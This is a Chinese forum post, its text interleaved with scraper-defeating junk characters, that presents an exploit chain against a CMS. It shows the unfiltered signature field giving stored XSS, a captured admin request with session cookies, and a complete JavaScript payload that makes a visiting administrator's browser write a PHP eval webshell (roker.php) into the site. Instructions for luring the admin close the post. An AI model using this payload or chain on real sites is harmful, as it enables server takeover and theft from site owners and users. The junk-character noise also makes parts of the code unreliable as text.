这个 CMS 以前 90 有人发了个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下了源码。
因为后台登录还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
, N1 Y! w" ]4 X4 F! [& I$ z4 f本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:" z3 j1 X: m" D
- U7 ~: K/ H2 [0 Z+ d I
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
( P; V+ b( _0 F! j# C
2 ~* J: V& W l6 v/ L/ S: |& F</textarea></td></tr>
$ h6 w' c d0 ~( _* H) @) Y
0 z! v4 i: N9 i T. a' N2 i user/do.php ' i, ]7 `: j) [6 x6 V# _% w/ e2 w
2 H$ ?5 L( o2 G" a" V' ]$ [
; A2 d1 j8 b4 ]3 ?( _0 ?( V
if($op=='zl'){ //资料" W! T) \. x1 Z
) W$ H2 O) e/ Y0 b
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
P3 c: u! R2 j5 w8 f1 Z0 {8 ]# S' } exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
: ? x0 Z$ ]0 v: I( n& f3 q 5 O) o7 f, Q! i: s( ]
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
8 a" g" j8 d" F4 [
0 n4 h$ Z( h6 P* ]2 x( u CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'5 L' `3 b& G6 r3 e! Y
where CS_Name='".$cscms_name."'";
$ j# _& S0 A8 F* W" n
& A, \8 D2 `% {2 W5 l# {5 [ if($db->query($sql)){. D- n1 J- d U: x& r, O2 Z1 |
; W5 W$ B8 H# u' d6 h
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));& c8 A2 c0 u9 N \7 o* m
2 T0 H% f+ ^3 G: K
}else{
" {9 w3 r7 a: p4 B3 G% K2 V) H7 V1 Q / \* _* c6 C' t
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));8 j |, t6 e4 i a u; H( _. B
* D& Q, ?7 Y5 l5 T; D) s" z
}+ z( l9 v8 m7 `( e% @
" G7 B( Y1 L6 h2 e
没有过滤导致 XSS 产生：签名 CS_Qianm 没有经过过滤就直接入库，而 skin_edit.php 又把它原样 echo 到 textarea 里，形成存储型 XSS。
后台看了下，很奇葩的是可以写任意格式的文件。
抓包：
; O* e2 [ |; c* e6 B' E9 f) a! u k+ r7 d" d% \
) B, |! s5 d* j# \) s. q本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.13 J2 n9 j' } Z: o' }& Z' q( r4 @
, D' t0 M5 w" i+ l8 d" }' c
Accept: text/html, application/xhtml+xml, */*( R3 C( R" F0 r
6 B+ ?" B0 B$ P) Y9 _Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
1 X9 t; E% w) j9 D
! V+ r9 O9 x' }Accept-Language: zh-CN" `5 Y- B' Z" @5 V: g
8 h/ z" {# I9 ]* n# c3 e& d/ G
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)! D+ ^- r: n! K+ R4 F
# n9 K6 v! o' K3 T, s/ x
Content-Type: application/x-www-form-urlencoded
4 M9 M% s4 h/ ]/ B# m! h v " p5 L' s, [$ w* M M [9 d: G2 z
Accept-Encoding: gzip, deflate
0 X. k/ G3 S+ R! ~; w
- x4 I; `7 ^6 I6 s, _) O/ h4 w7 xHost: 127.0.0.1
9 N+ b$ i( H! z, l 8 F4 B( d% x+ z; b% l/ X) ~
Content-Length: 38
" B5 Y: x0 e6 _1 k% y4 Y e! h5 H2 H: Z- l9 q
DNT: 1' H, Q( Q2 h, e( z7 m
, P. D6 l: V! a; p% B
Connection: Keep-Alive
6 @- ?1 [+ e; n7 _" a8 \ # J+ i0 I2 s# S# W& i; C0 p1 Q
Cache-Control: no-cache7 G& _: G4 @- G- e5 y
7 r7 h! x, f; x1 X) k2 W, |Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655942 H8 [& Q$ l& A3 J" z% ]
7 T8 R) L- y; C9 v/ T
- ^/ y q5 `$ }name=aaa.php&content=%3Cs%3E%3Ca%25%3E$ U0 |( s9 ]6 X a& H
( Q- e6 Q4 B7 s' a& R0 ?
" _2 k3 q/ N: B a; U4 H
于是构造 JS 如下。
/ w3 ]; \" {; x: V8 Y( d
本帖隐藏的内容<script> 0 X/ l7 c* R) G7 Z. Y5 k% j5 e Q; C/ t
thisTHost = top.location.hostname;. u0 u1 t t& v1 u% M2 }
9 Z1 l+ T' E S6 o( g! MthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";/ ?) K) f% @ A; B2 _
; [; y2 s4 k0 R3 N9 f) l9 {
function PostSubmit(url, data, msg) {
) e3 f; @; l6 |" O var postUrl = url;- M) l d+ z) s. o9 s
2 M$ X& E6 R( w5 g var postData = data; ]1 D! f. d1 b4 ?/ r
var msgData = msg; " K$ E# F, M9 {
var ExportForm = document.createElement("FORM");
5 o. c* R4 R: G1 C e document.body.appendChild(ExportForm);
0 { U7 a7 v0 A& `$ n ExportForm.method = "POST";
: h$ v' g, E5 \. w, | var newElement = document.createElement("input");
( G0 u: k' K) r* r! Z newElement.setAttribute("name", "name");
7 U4 Q" C7 V, S9 r& K3 i newElement.setAttribute("type", "hidden");
$ r7 q' |9 T: [, b e; K var newElement2 = document.createElement("input");
8 ]- X4 W) [8 U. m) b2 g newElement2.setAttribute("name", "content");
3 H1 O8 s, i& |/ r1 q newElement2.setAttribute("type", "hidden"); 1 a5 G" K$ k) |' j. n" M
ExportForm.appendChild(newElement); " F' c1 V( Z6 |3 f: j E( }2 X. @
ExportForm.appendChild(newElement2);
6 y2 A6 b: c8 s* c& t newElement.value = postData;
( h+ x- h" |6 ~0 C) } newElement2.value = msgData; 0 j& [' W% [- J* C
ExportForm.action = postUrl; - y3 `2 r7 a; \4 Z
ExportForm.submit(); 9 f; G3 A2 I9 i2 S
};
* Z+ r- ^6 f) \$ u4 D6 P * K" r$ W6 `* ^2 f3 W
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");$ G; K/ i x' k* h
3 N* A* X: o( B4 C) ?: n @
</script>
1 ~7 b$ u3 L" y1 b3 }6 Y
( N2 A3 ?" X, {
+ s6 |2 b1 \1 a2 U1 H6 z6 R0 G( Z* A& @+ r! b. I( }& r) j6 l
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入! j3 Z6 c/ r) X6 ~1 b6 i
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)% b. C: ?, h% f* l2 U5 Z
就会 在 skins\index\html\目录下生成 roker.php 一句话。 | 9 g- x$ H, A& Z9 U& q3 E